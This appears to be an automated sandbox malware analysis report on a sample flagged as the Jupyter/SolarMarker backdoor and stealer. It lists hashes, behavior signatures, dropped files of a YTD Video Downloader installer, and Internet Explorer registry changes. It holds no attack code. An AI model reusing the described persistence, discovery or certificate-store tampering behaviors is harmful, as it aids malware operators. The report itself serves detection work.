Malware Analysis Report

2024-10-16 02:54

Sample ID 241003-fzd8eswfrk
Target 0e19c4e90440e8ebf974e705990fadde_JaffaCakes118
SHA256 b0d7b86568b29605b5b9209be95f88d7033d6ab8ae9c6c1a100b44b8ea9e02fb
Tags
discovery jupyter backdoor execution stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

b0d7b86568b29605b5b9209be95f88d7033d6ab8ae9c6c1a100b44b8ea9e02fb

Threat Level: Known bad

The file 0e19c4e90440e8ebf974e705990fadde_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

discovery jupyter backdoor execution stealer trojan

Jupyter Backdoor/Client payload

Jupyter, SolarMarker

Downloads MZ/PE file

Blocklisted process makes network request

Loads dropped DLL

Drops startup file

Checks computer location settings

Executes dropped EXE

Checks installed software on the system

Command and Scripting Interpreter: PowerShell

Drops file in Program Files directory

Browser Information Discovery

System Location Discovery: System Language Discovery

Program crash

Enumerates physical storage devices

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Suspicious use of SendNotifyMessage

Modifies system certificate store

Modifies registry class

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Modifies Internet Explorer settings

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-03 05:18

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-03 05:18

Reported

2024-10-03 05:21

Platform

win7-20240903-en

Max time kernel

118s

Max time network

141s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.exe"

Signatures

Downloads MZ/PE file

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-8FG93.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-8FG93.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
N/A N/A C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A
N/A N/A C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A
N/A N/A C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A
N/A N/A C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A
N/A N/A C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A
N/A N/A C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A
N/A N/A C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A
N/A N/A C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A
N/A N/A C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A
N/A N/A C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A
N/A N/A C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A
N/A N/A C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A
N/A N/A C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A
N/A N/A C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A
N/A N/A C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A
N/A N/A C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A

Checks installed software on the system

discovery

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\codec\libavcodec_plugin.dll C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1040.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1053.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_output\libdirectsound_plugin.dll C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1033.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1060.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\plugins.dat.1904 C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\scripts.yds C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_filter\libugly_resampler_plugin.dll C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1038.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1052.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res2070.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\librtmp.dll C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\LICENSE C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_mixer\libinteger_mixer_plugin.dll C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\video_output\libdrawable_plugin.dll C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\video_output\libvmem_plugin.dll C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1031.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1048.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1030.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1059.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res9999.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1025.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1045.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\video_output\libwingdi_plugin.dll C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\access\libfilesystem_plugin.dll C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\manual.bat C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1034.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1035.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1061.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1029.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Uninstall.exe C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\COPYING.LGPLv2 C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_filter\libaudio_format_plugin.dll C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1026.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1050.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\COPYING.Apachev2 C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1055.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_filter\libtrivial_channel_mixer_plugin.dll C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\video_output\libdirect3d_plugin.dll C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1032.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res2052.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\libvlccore.dll C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1044.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1051.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\video_filter\libswscale_plugin.dll C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\COPYING.LGPLv3 C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1036.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1043.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res1049.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\FFMPEG.EXE C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_mixer\libfloat_mixer_plugin.dll C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\Lang\res2074.ini C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
File created C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\libvlc.dll C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-8FG93.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-MND9I.tmp\YTDSetup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DOMStorage C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "60" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "434094598" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DOMStorage\google.com\Total = "340" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DOMStorage\google.com\Total = "60" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DOMStorage\google.com\Total = "99" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "21" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = e0a1b2c15315db01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.google.com\ = "340" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DOMStorage\google.com\Total = "21" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.google.com\ = "21" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DOMStorage\google.com C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.google.com\ = "60" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DOMStorage\ytddownloader.com C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DOMStorage\google.com\NumberOfSubdomains = "1" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DOMStorage\ytddownloader.com\NumberOfSubdomains = "1" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "340" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{F91622B1-8146-11EF-B4B0-E62D5E492327} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.google.com C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.google.com\ = "99" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000303eef0e2cd1a9499efdd285a56ddc5000000000020000000000106600000001000020000000b9fee158fe4cc5ae10ed8b8888d2e704195cfb8e5b15185c3df130dc34dd2ec4000000000e8000000002000020000000fb0eb6dfdc564c58c33f697e73e6e9720b6f3a0aaa5c933b2e8c00818a2e42b690000000416c97b50ecf9c5a97b91f86b54b54ea5853f472555b2f4d72282993b0fd1bad3c1552f399296cff2d88fd49faecc806a9021f51f3057fdfd7f2d33d39bf685158fe4d9d90c370a0a0272ebd27b7ec44e5fe601d6d571bc9bb64942f94aab369a7d1d1b076ef8171d39aa9555f04f79ff9835def53fdc8ae982247369918b712a9140f41c0b6a9f87cc80d4151842b68400000000b6464656baaa61e63792c605566078eae577ee058dc902d89d461638508b8cc591f8756dd79741177d4509e3d4f7b6a5492f63c308cfa9e4320827de343ef94 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "99" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
